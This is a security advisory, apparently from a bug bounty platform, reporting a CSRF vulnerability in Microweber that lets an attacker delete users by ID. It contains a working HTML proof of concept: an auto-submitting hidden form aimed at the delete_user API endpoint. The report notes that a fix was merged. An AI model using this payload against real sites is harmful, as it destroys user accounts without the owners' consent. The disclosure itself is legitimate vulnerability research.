Cross-Site Request Forgery (CSRF) in microweber/microweber

Valid

Reported on

Sep 9th 2021


✍️ Description

Attacker able to delete any user if knows the user id parameter value.

🕵️‍♂️ Proof of Concept

Here after running PoC.html and you will see that the user with id 3 has been deleted.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.microweber.org/demo/api/delete_user">
      <input type="hidden" name="id" value="3" />
      <input type="hidden" name="&#95;method" value="POST" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

💥 Impact

Here a user with id value 3 will be deleted with CSRF attack.

We have contacted a member of the microweber team and are waiting to hear back 3 months ago
We have contacted a member of the microweber team and are waiting to hear back 3 months ago
Peter Ivanov confirmed that a fix has been merged on 5383c2 3 months ago
Peter Ivanov has been awarded the fix bounty